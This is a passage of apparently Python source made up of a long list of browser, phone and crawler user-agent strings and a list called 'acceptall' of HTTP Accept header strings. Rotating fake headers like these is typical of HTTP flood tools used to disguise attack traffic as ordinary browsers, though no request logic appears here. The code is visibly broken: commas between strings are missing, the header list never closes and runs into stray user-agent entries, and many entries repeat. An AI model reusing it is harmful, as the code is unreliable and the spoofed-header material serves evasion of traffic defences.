"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
"msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0"]
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n'
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1","Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1","Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5","Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8",
